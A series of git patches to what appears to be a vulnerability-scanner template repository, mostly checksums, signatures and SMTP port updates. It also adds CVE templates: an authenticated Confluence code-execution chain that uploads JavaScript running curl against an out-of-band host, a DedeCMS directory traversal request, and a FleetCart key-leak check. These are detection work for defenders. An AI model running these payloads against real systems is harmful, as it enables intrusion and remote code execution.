ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:104a05345b6f53f2e99ddf5cf8b804cfd40199e9 +templates-checksum.txt:691c0dd076917a771f3a15fb973a7866a85d1f5a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6c40d5b8e9fae3cce9b92a6fc0c1e5204304549d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 10:23:55 +0000 Subject: [PATCH 1322/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 42c5934e11..6ea040fb02 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' + - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: jobs: From 9afec19a5ea05575bda637ba61e8b68e3574e0a5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 10:25:05 +0000 Subject: [PATCH 1323/1768] Auto Template Signing [Fri May 24 10:25:05 UTC 2024] :robot: --- http/cves/2023/CVE-2023-48084.yaml | 1 + http/exposed-panels/vrealize-hyperic-login-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 5c4c293207..67ded92e4f 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -68,3 +68,4 @@ http: regex: - 'name="nsp" value="(.*)">' internal: true +# digest: 4a0a0047304502204fbd6201bf925ccc24095849207a7b720d4bc11d315f598c77f8d89bf49bf70b022100dd8640ebaef3939c2317cc833a62e524308e3f0b1037da30858e14db33d28577:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml index 0938e0eb52..39d213a994 100644 --- a/http/exposed-panels/vrealize-hyperic-login-panel.yaml +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402206fbf5a90bc0ea990171212b454ce657bff2b79cb0e2c4473be28d8b330d410150220495745350f17a240b57809e2ed71db324b465e69f2b2d8b2ea467dd46f8ff202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b3edbffef844858faa5052bb606b784103dfcccf Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 24 May 2024 18:12:07 +0300 Subject: [PATCH 1324/1768] cve-2024-5230 --- http/cves/2024/CVE-2024-5230.yaml | 33 +++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/cves/2024/CVE-2024-5230.yaml diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml new file mode 100644 index 0000000000..d9b6f5a47c --- /dev/null +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -0,0 +1,33 @@ +id: CVE-2024-5230 +info: + name: FleetCart 4.1.1 - Information Disclosure + author: securityforeveryone + severity: medium + description: | + Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the "Razorpay" "razorpayKeyId". + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5230 + - https://packetstormsecurity.com/files/178770/FleetCart-4.1.1-Information-Disclosure.html + - https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-5230 + cwe-id: CWE-200 + epss-score: 0.00045 + epss-percentile: 0.15047 + tags: packetstorm,cms,fleetcart + +http: + - method: GET + path: + - "{{BaseURL}}/en/products?query=123" + + matchers: + - type: dsl + dsl: + - 'contains(body, "razorpayKeyId:")' + - 'contains(body, "loggedIn:")' + - 'contains(body, "storeName:")' + - 'status_code == 200' + condition: and From 809df087260350d00d8491bca448bd2dcd28b957 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 25 May 2024 02:52:59 +0530 Subject: [PATCH 1325/1768] Create CVE-2024-21683.yaml --- http/cves/2024/CVE-2024-21683.yaml | 64 ++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 http/cves/2024/CVE-2024-21683.yaml diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml new file mode 100644 index 0000000000..690ddc2f10 --- /dev/null +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -0,0 +1,64 @@ +id: CVE-2024-21683 + +info: + name: Atlassian Confluence Data Center and Server - Remote Code Execution + author: pdresearch + severity: high + description: | + Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code. + reference: + - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html + - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated + - https://nvd.nist.gov/vuln/detail/CVE-2024-21683 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.3 + cve-id: CVE-2024-21683 + cwe-id: CWE-78 + tags: cve,cve2024,atlassian,confluence,rce,authenticated + +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + POST /dologin.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + os_username={{username}}&os_password={{password}}&login=Log+in&os_destination= + + - | + POST /doauthenticate.action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Atlassian-Token: no-check + + password={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action + + - | + POST /admin/plugins/newcode/addlanguage.action HTTP/1.1 + Host: {{Hostname}} + X-Atlassian-Token: no-check + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE + + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE + Content-Disposition: form-data; name="languageFile";filename="{{randstr}}.js" + Content-type: text/javascript + + new java.lang.ProcessBuilder["(java.lang.String[])"](["curl","{{interactsh-url}}"]).start() + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE + Content-Disposition: form-data; name="newLanguageName" + + {{randstr}} + ------WebKitFormBoundaryFcBwsDjo5LkYWGWE-- + + matchers: + - type: dsl + dsl: + - status_code_1 == 302 && status_code_2 == 302 + - contains(interactsh_protocol, 'dns') + - contains(body_3, "confluence") + condition: and From 147d7c51bc7b1d956b119be5bc989a2f192c7f29 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 26 May 2024 00:45:57 +0530 Subject: [PATCH 1326/1768] Create CVE-2023-2059.yaml --- http/cves/2023/CVE-2023-2059.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2059.yaml diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml new file mode 100644 index 0000000000..a1240e2f7c --- /dev/null +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-2059 + +info: + name: DedeCMS 5.7.87 - Directory Traversal Vulnerability + author: pussycat0x + severity: medium + description: | + Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter. + reference: + - https://github.com/ATZXC-RedTeam/cve/blob/main/dedecms.md + - https://vuldb.com/?ctiid.225944 + - https://vuldb.com/?id.225944 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-2059 + cwe-id: CWE-28 + epss-score: 0.00107 + epss-percentile: 0.42813 + cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:* + metadata: + vendor: dedecms + product: dedecms + fofa-query: app="DedeCMS" + tags: cve,cve2023,dedecms + +http: + - raw: + - | + GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\..\..\ HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "dirname(__FILE__)" + - "$cfg_basedir" + condition: and + + - type: status + status: + - 200 From b3d24fcd8af0c948b5a6c45a0aaacfb556329b8d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sun, 26 May 2024 00:48:50 +0530 Subject: [PATCH 1327/1768] lint -fix --- http/cves/2023/CVE-2023-2059.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index a1240e2f7c..7d5cf4ebcc 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -22,7 +22,7 @@ info: vendor: dedecms product: dedecms fofa-query: app="DedeCMS" - tags: cve,cve2023,dedecms + tags: cve,cve2023,dedecms http: - raw: @@ -38,7 +38,7 @@ http: - "dirname(__FILE__)" - "$cfg_basedir" condition: and - + - type: status status: - 200 From 5f13c86b2101a6440cfc3266b4a962ce1b294417 Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 09:04:43 +0330 Subject: [PATCH 1328/1768] Update smtp-service-detect ports --- network/detection/smtp-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index 9138afa5a1..71b4449824 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -2,12 +2,12 @@ id: smtp-service-detect info: name: SMTP Service Detection - author: pussycat0x + author: pussycat0x,userdehghani severity: info description: | SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. metadata: - max-request: 1 + max-request: 4 tags: network,service,smtp,detect,mail tcp: @@ -15,7 +15,7 @@ tcp: - data: "\r\n" host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers: - type: word From 33e3a5b28c56dd5a18261605e482085f6fe5d247 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 26 May 2024 16:54:24 +0200 Subject: [PATCH 1329/1768] Add files via upload --- http/exposed-panels/microfocus-filr-panel.yaml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index 6e2a354d47..8aa1782d6b 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -2,7 +2,7 @@ id: microfocus-filr-panel info: name: Micro Focus Filr Login Panel - Detect - author: ritikchaddha + author: ritikchaddha,righettod severity: info description: Micro Focus Filr login panel was detected. classification: @@ -21,6 +21,9 @@ http: - method: GET path: - "{{BaseURL}}/filr/login" + - "{{BaseURL}}/login" + + stop-at-first-match: true matchers-condition: and matchers: @@ -28,8 +31,18 @@ http: part: body words: - "Micro Focus Filr" + - "Filr Appliance" + condition: or - type: status status: - 404 -# digest: 4b0a00483046022100b581b8f63993790bf5a89f8c413281bb7065e031741d55cbca6849a4511328dc0221008e321e620f27ae94c13f9efad92bd5ccb0cfa5e81008e38c80e2eb5620ac4b01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)\s+([0-9-]+)\s+Micro\s+Focus' \ No newline at end of file From 01f41378c7acbb69fe1862f63a3446931391d612 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 26 May 2024 17:36:43 +0200 Subject: [PATCH 1330/1768] Update sap-netweaver-detect.yaml --- http/technologies/sap/sap-netweaver-detect.yaml | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index baceb6a655..7c8b948da0 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -2,9 +2,9 @@ id: sap-netweaver-detect info: name: SAP NetWeaver ICM Detection - author: randomstr1ng + author: randomstr1ng,righettod severity: info - description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) + description: Detection of SAP NetWeaver ABAP Webserver or Java Application Server (ICM/ICF) metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 @@ -15,8 +15,9 @@ http: path: - "{{BaseURL}}" - host-redirects: true + redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: regex part: header @@ -25,11 +26,17 @@ http: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or + + - type: word + part: body + words: + - "SAP NetWeaver Application Server" + - "SAP NetWeaver Developer Studio" + - "SAP Management Console" + condition: or extractors: - type: kval part: header kval: - "server" - -# digest: 4a0a0047304502205ce9bb123b742b34ca31841fd436aa2f8c05a0b05b2009420d1b047aed961323022100da4afb286a802f18d431906368ac4573c3ff8238de457b48ead1a7eee207ce73:922c64590222798bb761d5b6d8e72950 From 99f25932f4b246899fc76ebc8105bded635d85c3 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 26 May 2024 17:41:32 +0200 Subject: [PATCH 1331/1768] Fix linter error --- http/technologies/sap/sap-netweaver-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index 7c8b948da0..9c80b45879 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -26,7 +26,7 @@ http: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or - + - type: word part: body words: From 33468febd19b67a401a6837f2fc2160274e5dea3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 26 May 2024 19:46:02 +0000 Subject: [PATCH 1333/1768] Auto Generated Templates Checksum [Sun May 26 19:46:02 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dac3af48e3..44bc51782c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3192,7 +3192,7 @@ http/cves/2023/CVE-2023-47218.yaml:17dcf8eb7f320608649c5031de12070b46a11ebf http/cves/2023/CVE-2023-47246.yaml:87b56eba15f5c19a9a03e679fb770600520ea2d1 http/cves/2023/CVE-2023-47643.yaml:77261db868e2b2788787eb158eb22f6238707b3c http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e -http/cves/2023/CVE-2023-48084.yaml:0b242dabc8934b6ed10bd722d950d3e6b19516d6 +http/cves/2023/CVE-2023-48084.yaml:45180a45c8d4bb126de978c630e437e3b5be4861 http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 http/cves/2023/CVE-2023-49070.yaml:ea832772cb56e40e0acc8527138089777b673f16 http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49 @@ -4512,7 +4512,7 @@ http/exposed-panels/vmware-vcenter-converter-standalone.yaml:afd6381e2632114b860 http/exposed-panels/vmware-vcloud-director.yaml:1cc3968a991cd6cc1df9ef69bce9855ce0263481 http/exposed-panels/vodafone-voxui-panel.yaml:8c1897eb27b8ad1df6322dcfff01cfe403fc7e94 http/exposed-panels/voipmonitor-panel.yaml:e71536ce7d33bdb21196e43d271599461210c00c -http/exposed-panels/vrealize-hyperic-login-panel.yaml:93e0073e433d8250100aad758f563f4222537620 +http/exposed-panels/vrealize-hyperic-login-panel.yaml:da4dd0d80ada82ae2cad2905b60b7171c6887bd7 http/exposed-panels/vrealize-loginsight-panel.yaml:fd0b96b27df826ead5e909036f608a45b8fdee99 http/exposed-panels/vue-pacs-panel.yaml:a9409187ebedd24db1b6fe057b87c234ba5cf34a http/exposed-panels/wago-plc-panel.yaml:408e8ec5941005afb61d1f1b11501fefcf33b946 @@ -8452,7 +8452,7 @@ network/detection/rtsp-detect.yaml:d6b839083a1d1a39445f6cde00325e4467153ae6 network/detection/samba-detect.yaml:4c98619a9d742894136cc722e2571ab9338c18e0 network/detection/sap-router.yaml:3cdb63aecfb328ce98b6bf81bbc5de6e61d70526 network/detection/smb-detect.yaml:dca4a7005c959c0a407f6413b3e89638c485ff13 -network/detection/smtp-detect.yaml:ff684cce020106c05bd6ed8ca40c729120c2c2af +network/detection/smtp-detect.yaml:de05717ff94b6234f8c2304472926bd55b312c59 network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6911f network/detection/starttls-mail-detect.yaml:d172df5edae01aaaeba44b7788ce7511fc309b66 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 @@ -8563,7 +8563,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:691c0dd076917a771f3a15fb973a7866a85d1f5a +templates-checksum.txt:a17fe018bfb1c5241549fb7227553495fb52cbcd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d57735cc141c35d23953b640296cb002190b5a3e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 26 May 2024 19:47:49 +0000 Subject: [PATCH 1334/1768] Auto Template Signing [Sun May 26 19:47:49 UTC 2024] :robot: --- network/detection/smtp-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index 71b4449824..5031317fb3 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -21,4 +21,4 @@ tcp: - type: word words: - "SMTP" -# digest: 4a0a00473045022100fc41671fb893771ddee55d9e73176da35cda2eb22b5509a3d423a23be83a46d302205c30a829f2d4af879e1983be5e4725c63e7fbd5db135867a71ef79a045c2ff8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100baa719aaeb5f325496022fb7ea0b39e178031af2fa5006307c6006f7e8633a7f022100cfd2ff7883c0f8425e5c9a146f8cd26b4604e63f6d1521f5c61e033523ec674d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1baa5b14f274948f6734cfca2a622dd817a6f01c Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:26:15 +0330 Subject: [PATCH 1335/1768] Update esmtp-detect.yaml --- network/detection/esmtp-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 8c6dcd8033..10b14a6395 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -2,7 +2,7 @@ id: esmtp-detect info: name: ESMTP - Detect - author: pussycat0x + author: pussycat0x,userdehghani severity: info description: | ESMTP was detected. @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers-condition: and matchers: From 51449afe49bb12a3212920e340f4004f32929e1e Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:28:06 +0330 Subject: [PATCH 1336/1768] Update esmtp-detect.yaml --- network/detection/esmtp-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 10b14a6395..7b353af8ef 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 + max-request: 4 shodan-query: ESMTP verified: true tags: network,detect,smtp,mail @@ -32,4 +32,4 @@ tcp: - "ESMTP Postfix" - "220" condition: and -# digest: 490a0046304402203a1fffa26c753ac23dccc2377fa851d78256f56ea912590637a203aaa55268ab02202f61ea792860ccb76be454a7b4a39ea73419a3c33b13d95ded5f83129df47780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a1fffa26c753ac23dccc2377fa851d78256f56ea912590637a203aaa55268ab02202f61ea792860ccb76be454a7b4a39ea73419a3c33b13d95ded5f83129df47780:922c64590222798bb761d5b6d8e72950 From 33db09019f4b6fbd33f6edaef7ce54ea1303949e Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:33:02 +0330 Subject: [PATCH 1337/1768] Update exim-detect.yaml --- network/detection/exim-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/network/detection/exim-detect.yaml b/network/detection/exim-detect.yaml index dac5b64098..63006cd2cd 100644 --- a/network/detection/exim-detect.yaml +++ b/network/detection/exim-detect.yaml @@ -2,7 +2,7 @@ id: exim-detect info: name: Exim - Detect - author: ricardomaia + author: ricardomaia,userdehghani severity: info description: | Exim can accept messages from remote hosts using SMTP over TCP/IP, and as well as from local processes. It handles local deliveries to mailbox files or to pipes attached to commands, as well as remote SMTP deliveries to other hosts. @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 + max-request: 2 shodan-query: product:"Exim smtpd" verified: true tags: network,detect,smtp,mail,exim @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - port: 587 + port: 465,587 matchers: - type: word From fa1bf7774235c13edca1393d41d94f8eaf0c13f2 Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:35:34 +0330 Subject: [PATCH 1338/1768] Update totemomail-smtp-detect.yaml --- network/detection/totemomail-smtp-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index 2442f7f1cb..57d7e92b84 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -2,12 +2,12 @@ id: totemomail-smtp-detect info: name: Totemomail SMTP Server Detection - author: princechaddha + author: princechaddha,userdehghani severity: info description: | Totemomail is a comprehensive email solution designed to address all aspects of digital communication security. metadata: - max-request: 1 + max-request: 3 tags: mail,smtp,network,totemomail,detect tcp: @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,465,587 matchers: - type: word From 75531cf5f74afde1ff7f69ce970d2dbcfcdc8cbf Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Sun, 26 May 2024 23:42:47 +0330 Subject: [PATCH 1339/1768] Update missing smtp ports --- network/detection/expn-mail-detect.yaml | 6 +++--- network/detection/starttls-mail-detect.yaml | 6 +++--- network/enumeration/smtp/smtp-commands-enum.yaml | 6 +++--- network/enumeration/smtp/smtp-user-enum.yaml | 6 +++--- 4 files changed, 12 insertions(+), 12 deletions(-) diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index 730b5ac4d3..6c43bc92d8 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -2,12 +2,12 @@ id: expn-mail-detect info: name: EXPN Mail Server Detect - author: r3dg33k + author: r3dg33k,userdehghani severity: info description: | The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. metadata: - max-request: 1 + max-request: 4 tags: mail,expn,network,detect,smtp tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers: - type: word diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index d14256180b..45e0be3e07 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml @@ -2,12 +2,12 @@ id: starttls-mail-detect info: name: STARTTLS Mail Server Detection - author: r3dg33k + author: r3dg33k,userdehghani severity: info description: | STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one. metadata: - max-request: 1 + max-request: 4 tags: mail,starttls,network,detect,smtp tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers: - type: word diff --git a/network/enumeration/smtp/smtp-commands-enum.yaml b/network/enumeration/smtp/smtp-commands-enum.yaml index bf7c6371df..95ad692f83 100644 --- a/network/enumeration/smtp/smtp-commands-enum.yaml +++ b/network/enumeration/smtp/smtp-commands-enum.yaml @@ -2,14 +2,14 @@ id: smtp-commands-enum info: name: SMTP Commands Enumeration - author: pussycat0x + author: pussycat0x,userdehghani severity: info description: | Attempts to use EHLO and HELP to gather the Extended commands supported by an SMTP server. reference: - https://nmap.org/nsedoc/scripts/smtp-commands.html metadata: - max-request: 1 + max-request: 4 shodan-query: smtp verified: true tags: network,enum,smtp,mail @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 matchers: - type: word diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index 6413362b1b..b8bfad3a4f 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -2,14 +2,14 @@ id: smtp-user-enum info: name: SMTP User Enumeration - author: pussycat0x + author: pussycat0x,userdehghani severity: medium description: | enumerate the users on a SMTP server by issuing the VRFY/EXPN commands reference: - https://nmap.org/nsedoc/scripts/smtp-enum-users.html metadata: - max-request: 1 + max-request: 4 shodan-query: smtp verified: true tags: network,enum,smtp,mail @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - port: 25 + port: 25,2525,465,587 attack: batteringram payloads: From 0e7869a8f71b4b346c22664976d0c01a5bce05c8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 06:26:26 +0000 Subject: [PATCH 1340/1768] Auto Generated Templates Checksum [Mon May 27 06:26:26 UTC 2024] :robot: --- templates-checksum.txt | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 44bc51782c..a4654fdb40 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8423,7 +8423,7 @@ network/detection/detect-jabber-xmpp.yaml:db7472ba34e3306c0afd5b3bfe535e1764de8d network/detection/dotnet-remoting-service-detect.yaml:b438f75ba5e8c1f227d14794db20172ab89468cf network/detection/esmtp-detect.yaml:dee11038a25d263f8b3d0f06ad53fb2b84a44c2a network/detection/exim-detect.yaml:c9541f70a921c64575e67ed7c7e0a364a28c613e -network/detection/expn-mail-detect.yaml:651740f7523e435b000d01e7a9103c90bf25d3f5 +network/detection/expn-mail-detect.yaml:53d80f2928345819aa20811d080b66a1607f9008 network/detection/finger-detect.yaml:ad87af0aee39f2d5013dbee8692c37414df78363 network/detection/gnu-inetutils-ftpd-detect.yaml:f089a5ff96e16e7fb260973351f635735db6fdaf network/detection/gopher-detect.yaml:fc44051b14f3cb7f8b70dddba8231ea83d5e4dbd @@ -8452,9 +8452,9 @@ network/detection/rtsp-detect.yaml:d6b839083a1d1a39445f6cde00325e4467153ae6 network/detection/samba-detect.yaml:4c98619a9d742894136cc722e2571ab9338c18e0 network/detection/sap-router.yaml:3cdb63aecfb328ce98b6bf81bbc5de6e61d70526 network/detection/smb-detect.yaml:dca4a7005c959c0a407f6413b3e89638c485ff13 -network/detection/smtp-detect.yaml:de05717ff94b6234f8c2304472926bd55b312c59 +network/detection/smtp-detect.yaml:5fa2e7cef1d9aec1de4c88d093d974c897f4dc9d network/detection/sshd-dropbear-detect.yaml:e73630bf9c1c92ff4f3132d659db23cd69d6911f -network/detection/starttls-mail-detect.yaml:d172df5edae01aaaeba44b7788ce7511fc309b66 +network/detection/starttls-mail-detect.yaml:8714db63581c72fbbe8d013abb39f7c46c03d3a2 network/detection/teamspeak3-detect.yaml:8d2481cf446ed4d2587be5016b66b3b74ad4ec43 network/detection/telnet-detect.yaml:6d553279d154fa767ad8cbdbdc3b0573fb1e03a9 network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a77a5be5 @@ -8470,8 +8470,8 